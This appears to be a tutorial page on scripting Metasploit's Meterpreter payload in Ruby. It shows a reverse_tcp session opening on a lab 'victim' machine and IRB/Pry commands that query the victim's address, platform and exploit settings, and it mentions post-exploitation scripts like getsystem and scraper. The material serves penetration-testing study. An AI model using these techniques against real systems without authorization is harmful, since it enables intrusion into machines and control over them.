Meterpreter
From the official wiki, The Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written by Matt "skape" Miller, dozens of contributors have provided additional code, and the payload continues to be frequently updated as part of Metasploit development.
Meterpreter is a payload framework that provides APIs to interact with by writing scripts and plugins that increase its capabilities. You can find Meterpreter scripts in metasploit-framework/scripts/meterpreter
those scripts that you use in post exploitation using run (e.g. getuid, getsystem, migrate, scraper, etc). Meterpreter source code is located in metasploit-framework/lib/rex/post/meterpreter
.
Actually, you can't imagine the power of Meterpreter until you read its wishlist and features not just use it.
To get started, let's to get a Meterpreter shell on a victim machine to start practicing it inline then we can write some scripts
Once you get the Meterpreter shell type irb
to be dropped into ruby's IRB. Most of required modules will be loaded already. Then type require 'irb/completion'
to support auto-completion for the IRB console, just like the follows
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.18:4444
[*] Starting the payload handler...
[*] Sending stage (957486 bytes) to 192.168.0.18
[*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.18:33603) at 2015-11-22 06:33:00 +0300
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the Meterpreter client
>> require 'irb/completion'
=> true
If you would like to use Pry
instead of irb
then type pry
and make the console more readable. Personally, I'd prefer pry
meterpreter > pry
_pry_.prompt = proc { "-> " }
As you can see, you've been dropped to the IRB console with an instance variable called client
of the running Meterpreter.
Try this as a start
print_good("Rubyfu!")
- To list all associated methods with
client
instance
This will return an array.
puts client.methods.sort
Let's to check some of the interesting methods there.
- Victim's IP address and port
client.session_host
client.session_port
- Victim's computer information and plat form
client.info
client.platform
Returns
=> "win7-64-victim\\Workshop @ WIN7-64-VICTIM"
=> "x86/win32"
- Get the current exploit datastore
client.exploit_datastore
# Or
client.exploit.datastore
Returns a hash contains all the exploit information that result to this Meterpreter session
{"VERBOSE"=>false, "WfsDelay"=>0, "EnableContextEncoding"=>false, "DisablePayloadHandler"=>false, "ExitOnSession"=>true, "ListenerTimeout"=>0, "payload"=>"windows/meterpreter/reverse_tcp", "LPORT"=>4444, "ReverseConnectRetries"=>5, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "EXITFUNC"=>"process", "AutoLoadStdapi"=>true, "AutoVerifySession"=>true, "AutoVerifySessionTimeout"=>30, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "lhost"=>"192.168.0.18", "ReverseListenerBindPort"=>0, "TARGET"=>0}